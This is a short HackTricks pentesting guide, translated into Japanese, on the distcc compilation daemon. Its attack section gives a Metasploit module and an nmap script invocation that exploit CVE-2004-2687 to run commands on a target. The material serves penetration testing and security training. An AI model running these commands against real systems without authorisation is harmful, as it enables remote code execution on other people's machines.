hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.6 KiB
Raw Permalink Blame History

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

基本情報

Distccは、ネットワーク内の他のコンピュータのアイドル処理能力を利用してコンパイルプロセスを強化するツールです。distccがマシンに設定されると、このマシンは他のシステムにコンパイルタスクを分配することができます。この受信システムはdistccdデーモンを実行しており、送信されたコードを処理するために互換性のあるコンパイラがインストールされている必要があります。

デフォルトポート: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

攻撃

任意のコードを実行するために CVE-2004-2687 に脆弱かどうかを確認します:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

このサービスをshodanが検出するとは思いません。

Resources

Post created by Álex B (@r1p)

{% hint style="success" %} AWSハッキングを学び、練習するHackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、練習するHackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする
{% endhint %}